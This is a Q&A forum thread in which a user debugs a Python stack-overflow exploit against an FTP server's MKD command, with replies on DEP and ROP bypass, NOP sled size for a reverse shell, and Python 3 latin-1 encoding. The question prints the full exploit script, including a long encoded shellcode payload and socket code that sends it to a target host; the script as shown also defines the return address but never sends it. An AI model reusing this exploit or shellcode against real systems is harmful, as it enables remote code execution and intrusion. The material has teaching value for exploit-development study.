Immunity Debugger: Access violation when executing

Question (votes: 0, answers: 3)

I am writing a simple exploit using jmp esp, but after jumping to esp at address 00B7FC2C, Immunity shows the error: Access violation when executing [00B7FC2C]

Here is my code:

#!/usr/bin/python2.7

import  sys, os, socket

fuzz = "\x41" * 248
eip = "\x59\x54\xC3\x77"
nops = "\x90" * 8

shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"

command = "MKD"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('10.0.0.2',21))
print "\n" + s.recv(1024)
s.send('USER anonymous\r\n')
print "\n" + s.recv(1024)
s.send('PASS \r\n')
print "\n" + s.recv(1024)
s.send(command + '' + fuzz + nops + shellcode + '\r\n')
print "\n" + s.recv(1024)
s.send('QUIT\r\n')
s.close()
Tags: exploit, shellcode

3 Answers

2 votes

Since you did not include the opcodes at the address or the register values, I will point out the most likely explanation. The process you are exploiting appears to be using Data Execution Protection (DEP) to prevent data on the stack from being executed as code. The trick to executing shellcode under DEP is to use Return Oriented Programming (ROP) to call VirtualProtect() or a similar function to disable DEP on the memory region holding the shellcode before returning control to it. You can find more information on bypassing DEP here: https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/


0 votes

I ran into a similar problem, and it turned out that increasing the nops variable to 16 or even 32 helped to get a revshell.


0 votes

I had the same problem while using python3. If you are using python3, the solution is to encode it as "latin-1".
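To show why the latin-1 encoding matters in Python 3, here is an added example (not code from the question or from any answer). It uses a constructed buffer of padding, the question's 4-byte address string and a short NOP sled, with no shellcode; the function names build_payload, wire_bytes and encoding_drift are assumptions for this illustration.

```python
# Added example: in Python 3 a str is a sequence of code points, so "\x90"
# only becomes the single byte 0x90 when encoded with latin-1. Encoding with
# utf-8 (the default for str.encode) expands every code point >= 0x80 into two
# bytes, which shifts every later offset and corrupts the intended address.

def build_payload(pad_len=248, nop_len=8):
    """Constructed stand-in for the question's buffer (no shellcode)."""
    fuzz = "\x41" * pad_len           # 'A' padding, as in the question
    eip = "\x59\x54\xC3\x77"          # the 4-byte address string from the question
    nops = "\x90" * nop_len           # 0x90 is >= 0x80: utf-8 would double it
    return fuzz + eip + nops

def wire_bytes(payload):
    """Encode a str payload to the exact bytes the author intended.
    latin-1 maps each code point 0..255 to one byte of the same value."""
    if any(ord(ch) > 0xFF for ch in payload):
        raise ValueError("payload has code points above 0xFF; not a byte string")
    return payload.encode("latin-1")

def encoding_drift(payload):
    """Return (latin1_len, utf8_len); unequal means bytes were expanded."""
    return len(payload.encode("latin-1")), len(payload.encode("utf-8"))

if __name__ == "__main__":
    p = build_payload()
    l1, u8 = encoding_drift(p)
    print("latin-1: %d bytes, utf-8: %d bytes" % (l1, u8))
    # With latin-1 the address still sits exactly at offset 248.
    print(wire_bytes(p)[248:252])
```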
